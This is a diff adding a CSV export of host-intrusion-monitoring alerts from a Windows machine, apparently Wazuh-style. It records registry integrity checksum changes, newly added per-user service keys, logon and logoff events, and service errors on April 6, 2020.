+Old md5sum was: '671078222c6f28f8a987ef233af7d5a5' +New md5sum is : '5de0ef21cee3c7b87f2fab30b8b06e2e' +Old sha1sum was: 'c62d69328b5a046dd8494e6a38df8074f8310102' +New sha1sum is : '95450da791d27d0a0e456663988211c24b30dbec' +" +"Apr 6, 2020 @ 14:39:26.710",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '73c63a01a46264ab050a9804c4648382' +New md5sum is : '67b63b70acc4cf09439b0064f5375078' +Old sha1sum was: '5ef9fab8416ce4431f5ef1872f0a97ec347b05b6' +New sha1sum is : 'd5ad2ffed235439932f7b3d18a9d28ffe83d1079' +" +"Apr 6, 2020 @ 14:39:22.308",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'fa742e572a0ab3ad838cdc36f548a2e7' +New md5sum is : 'b94f00fb649e58278413ddb218687776' +Old sha1sum was: '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +New sha1sum is : '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +" +"Apr 6, 2020 @ 14:39:18.428",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 14:39:12.928",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'f906c668d9a9517e97299e9a3d5136fe' +New md5sum is : '91719a43ee1d9abe2cfbc1a69b82550c' +Old sha1sum was: '9861531a255dbfbd2c4e14a0673818cc18a6ee0d' +New sha1sum is : 'c9429e02ac797b3eeb56ad03665a88cc10366270' +" +"Apr 6, 2020 @ 14:39:11.396",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\mssmbios\Data' checksum changed. 
+Old md5sum was: '1e6e38e0129cb1178036ce2d2de63896' +New md5sum is : '56e9f0a7add3da7f007b812f71fed075' +Old sha1sum was: 'c69f3fa6abcfb59085cdd1e6fe3925b88bf1eb8a' +New sha1sum is : 'e34bbe63c9ca7e70f4e38fca2b5911ca2863966f' +" +"Apr 6, 2020 @ 14:39:11.162",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: 'e8e23284dccb7ccee8c1c0f3d044aca0' +New md5sum is : 'b86fbb8c7365f0cd160fe1dd1a4e4de8' +Old sha1sum was: 'b6870b3d74893979c44b3336a301dce27cd672f1' +New sha1sum is : 'f01eba6dbe74107285007351b77304e1a19bc18e' +" +"Apr 6, 2020 @ 14:39:10.163",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: '03aad37d2328a1b41c130ad79ee23de7' +New md5sum is : 'a22f4624fc957eb22f371c4f482524df' +Old sha1sum was: '8f018594a2fffb11ad549b80854873098cfd2b7a' +New sha1sum is : '432b869a738326466b200cc25be6d8307cfdc040' +" +"Apr 6, 2020 @ 14:39:05.868",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: '578f6159462dbf35644b32173a6272dc' +New md5sum is : 'bad2d92e8c5f76681c68068d36d9f8de' +Old sha1sum was: '22d6c3d14484030a1223ac49b63a08d1adfb9f12' +New sha1sum is : 'a72e7b39c1d81678ec13d5d1bb05ce48683f8df2' +" +"Apr 6, 2020 @ 14:39:04.465",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: 'f906c668d9a9517e97299e9a3d5136fe' +New md5sum is : '91719a43ee1d9abe2cfbc1a69b82550c' +Old sha1sum was: '9861531a255dbfbd2c4e14a0673818cc18a6ee0d' +New sha1sum is : 'c9429e02ac797b3eeb56ad03665a88cc10366270' +" +"Apr 6, 2020 @ 14:39:01.788",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. 
+Old md5sum was: '8c770c3cc590a59f4fec7b255faee1f2' +New md5sum is : '3879a39655c450780e274d024098bdb5' +Old sha1sum was: '327f74762b95e433a1a48c7b90680a4e0a0bce77' +New sha1sum is : '8d6f073ffa5ccb93f82238394c9d0c663088a3db' +" +"Apr 6, 2020 @ 14:39:01.177",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: 'f906c668d9a9517e97299e9a3d5136fe' +New md5sum is : '91719a43ee1d9abe2cfbc1a69b82550c' +Old sha1sum was: '9861531a255dbfbd2c4e14a0673818cc18a6ee0d' +New sha1sum is : 'c9429e02ac797b3eeb56ad03665a88cc10366270' +" +"Apr 6, 2020 @ 14:38:57.881",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: 'ae9643074ec7a4ef81bb63a482e527c9' +New md5sum is : '8babdce3ab05d3473a80df927d06237f' +Old sha1sum was: 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +New sha1sum is : 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +" +"Apr 6, 2020 @ 14:38:54.224",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:38:50.318",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: '84f9da38aef52b57b0f950a9bf807f50' +New md5sum is : 'a397028e02aba031e9a6ca6ee2322c66' +Old sha1sum was: 'da7ce1f2de2fac02702a496feefad65ff9721121' +New sha1sum is : 'e1b5f87525d9b51c14a1dc0fb6f9183e950d4dd8' +" +"Apr 6, 2020 @ 14:38:43.974",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. 
+Old md5sum was: '62adcc7d0cabf983a9a5489de147c514' +New md5sum is : '903b8f5bbc25f56d3fac80d5240a6156' +Old sha1sum was: '223860dda4c8b799b031b85964a111ab435e0f6f' +New sha1sum is : '0acdfeec8685fdcaec51aa86a23df09cd0f828e6' +" +"Apr 6, 2020 @ 14:38:41.177",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'fcdb07c6a1ed824ae9455a64b2c0bb9e' +New md5sum is : '67c10bdce559c177fe0d89a2be194410' +Old sha1sum was: '584b2e2ecab9f7b853efa748028018d4698a2e87' +New sha1sum is : '4bac1afb15742d4fecc03d097a595ea33eed5376' +" +"Apr 6, 2020 @ 14:38:39.287",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:38:38.226",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:38:35.599",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:38:34.974",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed. +Old md5sum was: '6a4fdf3a9f7dc36fc03599f720d484d3' +New md5sum is : '775174ea9bf25c40ba381ca284d7511d' +Old sha1sum was: '9f469b80d1166a11ab0299760c6cb444ef555670' +New sha1sum is : 'eab80f5279cedff3dd227a62f8828aa899a27475' +" +"Apr 6, 2020 @ 14:38:34.477",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:38:33.897",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-2' checksum changed. +Old md5sum was: '41f836f91bdb9b4b1a6dd53b45a586c1' +New md5sum is : '60dd34472b7c4b4733f08655c4f60df2' +Old sha1sum was: 'd88322091bdfa95dd00b43c94043be94669c10d6' +New sha1sum is : '525a1f729b820c37784c2e975a559deaf184ebb7' +" +"Apr 6, 2020 @ 14:38:33.880",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. 
+Old md5sum was: 'd13ad6eb1737d32be81bf0fbad2ea850' +New md5sum is : '9f6b145dfd560fe21c8d05748910373f' +Old sha1sum was: 'd99b8a072444d528506f4a8568712fe5ddf19d83' +New sha1sum is : '1838fd4dbd6d85706ba7cced91d89cbd875eff11' +" +"Apr 6, 2020 @ 14:38:33.865",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'c3d3a1d8a57a3e55516e095343ffc85e' +New md5sum is : 'c07851f8f2e30eb65757347b948170ba' +Old sha1sum was: '3d8f8d08699f73356fd80de7e59de1c352109663' +New sha1sum is : '8b3f116aaee6cbd1dd5d8bf234c4f02b0a5c3e60' +" +"Apr 6, 2020 @ 14:38:33.833",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '9db7d225f461184a37dd7daf55bd9455' +New md5sum is : 'dca242a1798caa2a9ae6de537858dfe3' +Old sha1sum was: '6ad64ec507008882176ba696c556974a828a8fce' +New sha1sum is : 'c25d276ea70b377a2d82cd0b2ea1b00a07a517ca' +" +"Apr 6, 2020 @ 14:38:33.367",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:38:19.052",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:38:19.007",3,"IIS NetworkCleartext Logon Success", +"Apr 6, 2020 @ 14:38:17.364",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:38:17.334",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:38:16.990",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:37:54.525",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:37:54.478",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:37:51.171",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:37:51.151",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:37:51.127",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:37:51.072",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:37:50.027",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:37:48.807",9,"Windows Application error event", +"Apr 6, 2020 @ 14:37:34.197",3,"Windows User Logoff", +"Apr 6, 2020 @ 
14:37:34.165",3,"IIS NetworkCleartext Logon Success", +"Apr 6, 2020 @ 14:37:32.182",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:37:32.136",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:37:32.025",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:36:53.087",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:36:51.869",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:36:51.858",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:36:51.807",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:36:51.776",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:36:51.759",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:36:51.743",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:36:50.665",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:36:49.665",9,"Windows Application error event", +"Apr 6, 2020 @ 14:35:53.401",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:35:53.385",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:35:53.361",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:35:53.329",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:35:53.314",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:35:53.276",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:35:52.055",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:35:50.307",9,"Windows Application error event", +"Apr 6, 2020 @ 14:35:49.352",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\5\S-1-5-21-438079597-2123118846-2669748851-1001' was added. +" +"Apr 6, 2020 @ 14:35:49.336",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\4\S-1-5-21-438079597-2123118846-2669748851-1001' was added. +" +"Apr 6, 2020 @ 14:35:46.450",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_5eaf9d' was added. 
+" +"Apr 6, 2020 @ 14:35:46.414",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:35:46.399",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_4cf759' was added. +" +"Apr 6, 2020 @ 14:35:46.383",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:35:45.767",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_36ceed' was added. +" +"Apr 6, 2020 @ 14:35:45.737",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:35:45.588",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2c34c' was added. +" +"Apr 6, 2020 @ 14:35:45.562",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:35:45.422",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_163a67' was added. +" +"Apr 6, 2020 @ 14:35:45.256",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:35:38.416",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. 
+Old md5sum was: 'a45d92c5da48b32074d593f445bd1d73' +New md5sum is : '756dd006ccddd9a3acb123069bbf2b72' +Old sha1sum was: '7ad132c3e4354ce6748313a2eaf72d08a7d0ac2a' +New sha1sum is : 'ad92ac4e2be1d65930f4d4ed78dab3ae8577c070' +" +"Apr 6, 2020 @ 14:35:38.382",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: 'e18c1ccf736dc8f14e0a245e1f699739' +New md5sum is : 'b0fa798f750e19e3ddbcd77f4321253f' +Old sha1sum was: 'f3d9e58c5181cea0e86c13a904867deadeab2b49' +New sha1sum is : '759d4aa41127af628c11a6761e1f5d9bdf9412ed' +" +"Apr 6, 2020 @ 14:35:35.905",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:35:35.871",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:35:35.838",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:35:35.794",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:35:35.788",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:35:35.756",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:35:34.489",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:35:34.447",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_5eaf9d\Security' was added. 
+" +"Apr 6, 2020 @ 14:35:34.431",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:35:34.415",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:35:34.399",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:35:34.384",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:35:25.617",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: '5499f2465b93c7b9d2932c510d331d41' +New md5sum is : '646af30f5e20cdfc4f2c28c8e09ff02c' +Old sha1sum was: 'e252541cf73578cba0af49aaa7f38f21399e2f73' +New sha1sum is : '218e9b8a8ae906e403df7e730096ad92886a7c1c' +" +"Apr 6, 2020 @ 14:35:25.539",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '7f4e2820a9e8df5c63678e03b97248cc' +New md5sum is : '73c63a01a46264ab050a9804c4648382' +Old sha1sum was: '0b434b24c6b38ea405074bb98c33b674da54a900' +New sha1sum is : '5ef9fab8416ce4431f5ef1872f0a97ec347b05b6' +" +"Apr 6, 2020 @ 14:35:19.101",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:35:19.086",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:35:19.070",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_4cf759' was added. 
+" +"Apr 6, 2020 @ 14:35:19.054",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:35:19.039",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:35:19.008",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:35:15.945",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:35:15.930",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:35:15.914",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:35:15.898",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:35:15.883",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:35:15.867",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:35:14.658",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:35:14.642",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:35:14.608",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_4cf759' was added. 
+" +"Apr 6, 2020 @ 14:35:14.573",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:35:14.539",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:35:14.523",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:35:09.497",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:35:09.452",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_5eaf9d\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 14:35:09.423",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:35:09.384",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_4cf759' was added. +" +"Apr 6, 2020 @ 14:35:09.336",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_4cf759\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 14:35:09.320",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:35:08.339",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_36ceed' was added. +" +"Apr 6, 2020 @ 14:35:08.320",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_36ceed\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 14:35:08.304",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_36ceed\Security' was added. 
+" +"Apr 6, 2020 @ 14:35:00.086",3,"IIS NetworkCleartext Logon Success", +"Apr 6, 2020 @ 14:34:57.656",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:34:57.617",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:34:57.539",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:34:53.962",5,"Windows System error event", +"Apr 6, 2020 @ 14:34:53.948",5,"Windows System error event", +"Apr 6, 2020 @ 14:34:51.368",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:34:51.351",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:34:51.321",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:34:51.291",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:34:51.257",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:34:50.977",5,"Windows Push Notifications User Service_5eaf9d terminated unexpectedly", +"Apr 6, 2020 @ 14:34:50.960",5,"Connected Devices Platform User Service_5eaf9d terminated unexpectedly", +"Apr 6, 2020 @ 14:34:50.945",5,"Clipboard User Service_5eaf9d terminated unexpectedly", +"Apr 6, 2020 @ 14:34:43.195",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:34:43.179",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:34:43.164",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:34:43.148",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:34:43.132",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:34:43.102",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_36ceed\Security' was added. 
+" +"Apr 6, 2020 @ 14:34:43.086",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:34:43.054",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:34:43.038",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:34:43.023",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:34:43.007",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:34:42.992",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:34:42.976",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:34:42.960",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:34:42.945",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:34:42.930",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:34:42.914",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_36ceed' was added. 
+" +"Apr 6, 2020 @ 14:34:42.898",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:34:42.445",5,"Windows System error event", +"Apr 6, 2020 @ 14:34:41.962",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:34:41.930",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:34:41.914",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:34:41.898",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:34:41.883",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:34:41.867",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:34:41.851",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:34:41.835",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:34:41.805",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:34:41.791",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_4cf759\Security' was added. 
